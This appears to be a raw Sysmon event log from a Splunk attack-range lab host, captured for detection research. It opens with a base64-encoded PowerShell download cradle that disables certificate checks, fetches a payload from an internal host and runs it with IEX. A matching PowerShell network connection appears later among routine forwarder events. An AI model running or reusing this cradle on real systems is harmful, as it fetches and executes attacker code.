WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQA7ACQATQBTAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAHMAeQBzAHQAZQBtAC4AbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQAwAC4AMAAuADEALgAxADYALwBiAGgALwBzAHkAbgBjAC8AYQBvAGwALwBfAHIAcAAnACkAKQApADsASQBFAFgAIAAkAE0AUwA= 23542300x800000000000000035085931Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:23.220{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=0B4AF95EE41342F2BF5433C233C896FE,SHA256=88220C99C0008D0A332A0E23274F0516926C3188232583215FEDCD367E23AB45,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085930Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:23.089{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14DCCB66603E90646D4F1D8E9264E7E5,SHA256=5B56F11923EEB2085F4B94B389CC4629EE1ADBB56BEB0826CD7FC6DF69E5A8B7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085929Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:23.052{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=844183E5DC9E4E6D7634325CCFEEBE3C,SHA256=A451EAB8D6837099E52892ADAB79F24782E44802DAD47EA5689C73E579C4969F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085928Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:23.052{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DB8209BB89E7076C38BC00C311F5384D,SHA256=29F9EF70E59C7A3175F04DB7084A03CBCC98D8802F18B837CF2490901CEDEF10,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085933Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:24.168{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9770BD54C722AEA608A9A793559AE954,SHA256=C10DB653C0139FA6C32CDA0B6CBF68DAABFF059F8D4FB373A17A3D8578D49C4A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085932Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:48.060{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56778-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035085935Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:48.396{B81B27B7-4F1A-613A-5B90-03000000C801}6804C:\Windows\System32\wbem\WmiPrvSE.exeNT AUTHORITY\NETWORK SERVICEtcptruefalse10.0.1.15win-host-987.attackrange.local56779-false10.0.1.14WIN-DC-128389ldap 23542300x800000000000000035085934Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:25.186{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8FFDC03CD72E155ADE0ED31F2BFF4B24,SHA256=9DBDA9DBF0C64456746B2B23A9284528B9C4FDD0D20435CD848671B13D9A9E44,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085936Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:26.201{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=219C64CEB085AB9D1437BE749CB4BB9C,SHA256=B2F98AB53E5E6E21246C4FC8DFC92FA3F8C032F1229824F8390DBEBF1F085DDB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085937Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:27.215{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79D70879D3CBA63F7479FFFC7C9CE96D,SHA256=4A6A04317F0FCE571CB8BA39294E96DCA7BDAFFBB7159FB45F39C53F999DC2FA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085954Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:28.997{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085953Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:28.997{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085952Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:28.997{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085951Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:28.997{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085950Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:28.997{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-4FB8-613A-7890-03000000C801}4628C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085949Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:28.997{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4FB8-613A-7890-03000000C801}4628C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035085948Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:28.982{B81B27B7-4FB8-613A-7890-03000000C801}4628C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000035085947Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:28.298{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4FB8-613A-7790-03000000C801}344C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085946Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:28.298{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085945Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:28.298{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085944Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:28.298{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085943Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:28.298{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085942Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:28.298{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4FB8-613A-7790-03000000C801}344C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085941Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:28.298{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4FB8-613A-7790-03000000C801}344C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035085940Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:28.283{B81B27B7-4FB8-613A-7790-03000000C801}344C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000035085939Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:52.226{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56780-false10.0.1.12-8000- 23542300x800000000000000035085938Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:28.229{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6CD6341771320CA705ECB6230E2930B,SHA256=4A22570912E4614505510CA557E552E9444508EA2ED0483ADBBBE9A34B0179B6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085959Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:29.512{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D062A4ECC83D62BBCE4B4D820122B985,SHA256=1D17356F176FCA292650497947822D62114AFA2248B6B1FF7238799EAD8A2E66,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085958Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:29.512{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=844183E5DC9E4E6D7634325CCFEEBE3C,SHA256=A451EAB8D6837099E52892ADAB79F24782E44802DAD47EA5689C73E579C4969F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085957Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:29.243{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60C414EB45256597076B5A1DC15B2378,SHA256=57659222F59C052D41D559E55A9D1E6720BA4F5AB763C63254905D45D461236A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085956Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:29.143{B81B27B7-4FB8-613A-7890-03000000C801}46285644C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085955Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:28.997{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4FB8-613A-7890-03000000C801}4628C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035085960Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:30.426{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBC4F86109AA2C986C0B1BDC4FC27D4E,SHA256=7FFEE2E408AB6FA8B88D1A2A31BF6F3DEDB4420FA5476ADED76DA7BFBFBBD209,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085963Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:31.971{B81B27B7-2BC4-612D-7CF4-01000000C801}4056ATTACKRANGE\REED_SCHMIDTC:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\reed_schmidt\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\4056.xml~RF7185a417.TMPMD5=7FFA55FF6AC84742FC67B49B83BE3F12,SHA256=786CB96E30E42C16784374E9E5E14298976752E69CFAAF7FCB2ED016D9E3B6BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085962Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:31.525{B81B27B7-4FB2-613A-7690-03000000C801}2616ATTACKRANGE\REED_SCHMIDTC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085961Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:31.441{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D8766BAE86912DECC5CD0B9F585F990,SHA256=A16E7EC1FD1BDE5D28F4DC72347771579A42609237E5DDFEAB6E538155849525,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 